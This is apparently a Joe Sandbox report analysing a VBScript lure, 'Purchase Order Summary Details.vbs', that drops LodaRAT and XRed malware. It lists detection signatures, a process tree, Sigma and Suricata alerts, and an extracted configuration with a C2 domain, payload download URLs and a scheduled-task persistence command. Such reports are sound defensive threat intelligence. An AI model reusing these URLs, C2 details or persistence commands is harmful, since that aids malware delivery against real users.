Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Purchase Order Summary Details.vbs

Overview

General Information

Sample name:Purchase Order Summary Details.vbs
Analysis ID:1582354
MD5:3f54630f2965d5cce0465f1e80bb9b18
SHA1:51384b0b125117f4a25ffc39de41390651593f7a
SHA256:c0ef8a963ad2dae97f7277def4b571d5fb03270d46e640282ec806ca95d3b874
Tags:knkbkk212vbsuser-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Drops PE files to the startup folder
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 400 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • update.exe (PID: 7404 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 290A46D2614F4CE4F7AD75D2CEA2CE23)
  • update.exe (PID: 7592 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 290A46D2614F4CE4F7AD75D2CEA2CE23)
  • update.exe (PID: 7652 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe" MD5: 290A46D2614F4CE4F7AD75D2CEA2CE23)
    • ._cache_update.exe (PID: 7704 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
      • cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7848 cmdline: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 7856 cmdline: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 7744 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: B50AAC59E97F3D38A19ACB9253FABEBC)
      • WerFault.exe (PID: 608 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7744 -s 13324 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 7812 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • XNLAGO.exe (PID: 7908 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 2156 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • Synaptics.exe (PID: 4580 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: B50AAC59E97F3D38A19ACB9253FABEBC)
  • XNLAGO.exe (PID: 6340 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 8124 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • ._cache_update.exe (PID: 7096 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 5640 cmdline: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe" MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • XNLAGO.exe (PID: 6396 cmdline: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe MD5: FBE9E7E00A80A2321BADFA4E962FE15E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda

Malware Configuration

Threatname: XRed

{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XRedYara detected XRedJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\BQQQVU.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
      C:\ProgramData\Synaptics\RCXD42.tmpJoeSecurity_XRedYara detected XRedJoe Security
        C:\ProgramData\Synaptics\RCXD42.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\Users\user\Documents\CZQKSDDMWR\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
            C:\Users\user\Documents\CZQKSDDMWR\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              Click to see the 6 entries

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000003.1311156718.0000019411790000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000000.00000003.1307643273.0000019411A90000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    00000015.00000002.2552714676.00000000032E0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                      00000000.00000003.1311247337.0000019410D85000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        Click to see the 13 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.3.wscript.exe.1941183d1b4.2.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                          8.0.update.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            8.0.update.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                              0.3.wscript.exe.19411b43684.0.unpackJoeSecurity_XRedYara detected XRedJoe Security

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Potentially Suspicious Malware Callback Communication
                                Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, Initiated: true, ProcessId: 7704, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49840
                                Sigma detected: Script Initiated Connection to Non-Local Network
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 185.199.108.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 400, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
                                Sigma detected: Script Interpreter Execution From Suspicious Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 7704, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7856, ProcessName: wscript.exe
                                Sigma detected: Suspicious Script Execution From Temp Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 7704, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7856, ProcessName: wscript.exe
                                Sigma detected: WScript or CScript Dropper
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", ProcessId: 400, ProcessName: wscript.exe
                                Sigma detected: CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ProcessId: 7704, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BQQQVU
                                Sigma detected: Script Initiated Connection
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 185.199.108.133, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 400, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
                                Sigma detected: Startup Folder File Write
                                Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 400, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                Sigma detected: Suspicious Schtasks From Env Var Folder
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, CommandLine: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7784, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1, ProcessId: 7848, ProcessName: schtasks.exe
                                Sigma detected: Use Short Name Path in Command Line
                                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe" , ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe, ParentProcessId: 7704, ParentProcessName: ._cache_update.exe, ProcessCommandLine: WSCript C:\Users\user~1\AppData\Local\Temp\BQQQVU.vbs, ProcessId: 7856, ProcessName: wscript.exe
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", CommandLine|base64offset|contains: :^, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs", ProcessId: 400, ProcessName: wscript.exe
                                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, ProcessId: 7652, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                                Sigma detected: Office Macro File Creation
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 7744, TargetFilename: C:\Users\user~1\AppData\Local\Temp\uvpPtB1E.xlsm

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:48:05.966119+010020448871A Network Trojan was detected192.168.2.749821142.250.185.78443TCP
                                2024-12-30T11:48:05.966340+010020448871A Network Trojan was detected192.168.2.749820142.250.185.78443TCP
                                2024-12-30T11:48:07.087003+010020448871A Network Trojan was detected192.168.2.749830142.250.185.78443TCP
                                2024-12-30T11:48:08.158192+010020448871A Network Trojan was detected192.168.2.749842142.250.185.78443TCP
                                2024-12-30T11:48:09.140941+010020448871A Network Trojan was detected192.168.2.749858142.250.185.78443TCP
                                2024-12-30T11:48:10.918404+010020448871A Network Trojan was detected192.168.2.749875142.250.185.78443TCP
                                2024-12-30T11:48:10.992461+010020448871A Network Trojan was detected192.168.2.749874142.250.185.78443TCP
                                2024-12-30T11:48:11.918177+010020448871A Network Trojan was detected192.168.2.749886142.250.185.78443TCP
                                2024-12-30T11:48:12.011234+010020448871A Network Trojan was detected192.168.2.749891142.250.185.78443TCP
                                2024-12-30T11:48:12.930040+010020448871A Network Trojan was detected192.168.2.749897142.250.185.78443TCP
                                2024-12-30T11:48:12.997552+010020448871A Network Trojan was detected192.168.2.749899142.250.185.78443TCP
                                2024-12-30T11:48:13.886953+010020448871A Network Trojan was detected192.168.2.749907142.250.185.78443TCP
                                2024-12-30T11:48:13.887186+010020448871A Network Trojan was detected192.168.2.749908142.250.185.78443TCP
                                2024-12-30T11:48:14.868385+010020448871A Network Trojan was detected192.168.2.749918142.250.185.78443TCP
                                2024-12-30T11:48:14.871398+010020448871A Network Trojan was detected192.168.2.749919142.250.185.78443TCP
                                2024-12-30T11:48:15.841748+010020448871A Network Trojan was detected192.168.2.749932142.250.185.78443TCP
                                2024-12-30T11:48:15.842123+010020448871A Network Trojan was detected192.168.2.749931142.250.185.78443TCP
                                2024-12-30T11:48:16.859663+010020448871A Network Trojan was detected192.168.2.749941142.250.185.78443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:48:06.737170+010028221161Malware Command and Control Activity Detected192.168.2.749840172.111.138.1005552TCP
                                2024-12-30T11:48:43.441030+010028221161Malware Command and Control Activity Detected192.168.2.750159172.111.138.1005552TCP
                                2024-12-30T11:49:24.596078+010028221161Malware Command and Control Activity Detected192.168.2.750240172.111.138.1005552TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:48:06.244517+010028326171Malware Command and Control Activity Detected192.168.2.74982869.42.215.25280TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-12-30T11:47:31.588951+010028498851Malware Command and Control Activity Detected192.168.2.750237172.111.138.1005552TCP
                                2024-12-30T11:47:31.588951+010028498851Malware Command and Control Activity Detected192.168.2.750201172.111.138.1005552TCP
                                2024-12-30T11:47:31.588951+010028498851Malware Command and Control Activity Detected192.168.2.750242172.111.138.1005552TCP
                                2024-12-30T11:47:31.588951+010028498851Malware Command and Control Activity Detected192.168.2.750229172.111.138.1005552TCP
                                2024-12-30T11:47:31.588951+010028498851Malware Command and Control Activity Detected192.168.2.750126172.111.138.1005552TCP
                                2024-12-30T11:47:31.588951+010028498851Malware Command and Control Activity Detected192.168.2.749840172.111.138.1005552TCP
                                2024-12-30T11:47:31.588951+010028498851Malware Command and Control Activity Detected192.168.2.749940172.111.138.1005552TCP
                                2024-12-30T11:47:31.588951+010028498851Malware Command and Control Activity Detected192.168.2.750241172.111.138.1005552TCP
                                2024-12-30T11:47:31.588951+010028498851Malware Command and Control Activity Detected192.168.2.750159172.111.138.1005552TCP
                                2024-12-30T11:47:31.588951+010028498851Malware Command and Control Activity Detected192.168.2.750046172.111.138.1005552TCP
                                2024-12-30T11:47:31.588951+010028498851Malware Command and Control Activity Detected192.168.2.750240172.111.138.1005552TCP
                                2024-12-30T11:48:06.737170+010028498851Malware Command and Control Activity Detected192.168.2.749840172.111.138.1005552TCP
                                2024-12-30T11:48:15.830151+010028498851Malware Command and Control Activity Detected192.168.2.749940172.111.138.1005552TCP
                                2024-12-30T11:48:24.860628+010028498851Malware Command and Control Activity Detected192.168.2.750046172.111.138.1005552TCP
                                2024-12-30T11:48:34.378313+010028498851Malware Command and Control Activity Detected192.168.2.750126172.111.138.1005552TCP
                                2024-12-30T11:48:43.441030+010028498851Malware Command and Control Activity Detected192.168.2.750159172.111.138.1005552TCP
                                2024-12-30T11:48:52.470107+010028498851Malware Command and Control Activity Detected192.168.2.750201172.111.138.1005552TCP
                                2024-12-30T11:49:06.427039+010028498851Malware Command and Control Activity Detected192.168.2.750229172.111.138.1005552TCP
                                2024-12-30T11:49:15.516998+010028498851Malware Command and Control Activity Detected192.168.2.750237172.111.138.1005552TCP
                                2024-12-30T11:49:24.596078+010028498851Malware Command and Control Activity Detected192.168.2.750240172.111.138.1005552TCP
                                2024-12-30T11:49:33.688999+010028498851Malware Command and Control Activity Detected192.168.2.750241172.111.138.1005552TCP
                                2024-12-30T11:49:42.751974+010028498851Malware Command and Control Activity Detected192.168.2.750242172.111.138.1005552TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: http://xred.site50.net/syn/SUpdate.ini0$Avira URL Cloud: Label: malware
                                Source: http://xred.site50.net/syn/SSLLibrary.dlAvira URL Cloud: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\RCXD42.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\RCXD42.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\BQQQVU.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Found malware configuration
                                Source: 0.3.wscript.exe.19411b43684.0.unpackMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                                Multi AV Scanner detection for dropped file
                                Source: C:\ProgramData\Synaptics\RCXD42.tmpReversingLabs: Detection: 92%
                                Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeReversingLabs: Detection: 68%
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeReversingLabs: Detection: 92%
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeReversingLabs: Detection: 68%
                                Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1ReversingLabs: Detection: 92%
                                Multi AV Scanner detection for submitted file
                                Source: Purchase Order Summary Details.vbsVirustotal: Detection: 46%Perma Link
                                Source: Purchase Order Summary Details.vbsReversingLabs: Detection: 31%
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.0% probability
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Documents\CZQKSDDMWR\~$cache1Joe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\RCXD42.tmpJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JPS[1].exeJoe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
